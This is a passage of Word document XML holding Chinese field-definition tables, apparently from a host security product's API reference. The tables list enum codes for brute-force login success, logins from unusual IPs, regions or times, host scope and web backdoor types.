            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F80E02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="753E0591" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DB48BFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="591" w:name="_Toc115166368"/>
      <w:bookmarkStart w:id="592" w:name="是否暴力破解成功的登录"/>
      <w:bookmarkEnd w:id="590"/>
      <w:r>
        <w:t>是否暴力破解成功的登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1459"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DF2E80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26ABD9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F8973C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CEADEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FDCB562" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ABC8F0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crackSuccess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EC86773" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59356125" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E3CBFED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012774DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crackSuccess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61BA9999" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EA36A95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B9BD339" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="593" w:name="_Toc115166369"/>
      <w:bookmarkStart w:id="594" w:name="不在常用ip段登录"/>
      <w:bookmarkEnd w:id="592"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>不在常用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>段登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="593"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1334"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4FB6F8D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402E962" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC00681" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37C65BA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CD44EF4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39766FBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FA94848" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C46A27C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4001B3CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E5D3AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F5DF53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11854055" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C5B9EC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="595" w:name="_Toc115166370"/>
      <w:bookmarkStart w:id="596" w:name="不在常用区域的登录"/>
      <w:bookmarkEnd w:id="594"/>
      <w:r>
        <w:t>不在常用区域的登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="595"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1968"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="57A929F3"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1E73A4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EB42EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="017098F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5746C688" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FBB308A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B41D43C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4777BAD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="597185E2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="513B2ABE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65E3A4F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="693CB826" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="732A2782" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="597" w:name="_Toc115166371"/>
      <w:bookmarkStart w:id="598" w:name="不在常用时间的登录"/>
      <w:bookmarkEnd w:id="596"/>
      <w:r>
        <w:t>不在常用时间的登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="597"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1612"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AC2A4EF"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33AA275" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7742A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594442C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7548288C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="083E3A19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56477951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F060706" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="453546B2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C488BFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="362EDF3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F373D3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27E5E5F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="599" w:name="_Toc115166372"/>
      <w:bookmarkStart w:id="600" w:name="主机范围"/>
      <w:bookmarkEnd w:id="598"/>
      <w:r>
        <w:t>主机范围</w:t>
      </w:r>
      <w:bookmarkEnd w:id="599"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1199"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B2D9D6E"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9B423A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EC7845F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="572E02C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35693CED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FFD5895" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="753C1AE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDFFFE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CA6D558" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21531B2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C466757" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03F72DDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64A39C3D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67535FF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04948BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51BD4241" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73ADCE30" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="601" w:name="_Toc115166373"/>
      <w:bookmarkStart w:id="602" w:name="web后门类型"/>
      <w:bookmarkEnd w:id="600"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>web后门类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="601"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2041B9B0"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DCBF534" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="448AD024" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C5FBF7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A7341D7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="147D4CE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25FC546C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C3F7B8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="783C727D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B18D61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70898585" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66D443DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1680B1C6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42011341" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E4C898B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="194566AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
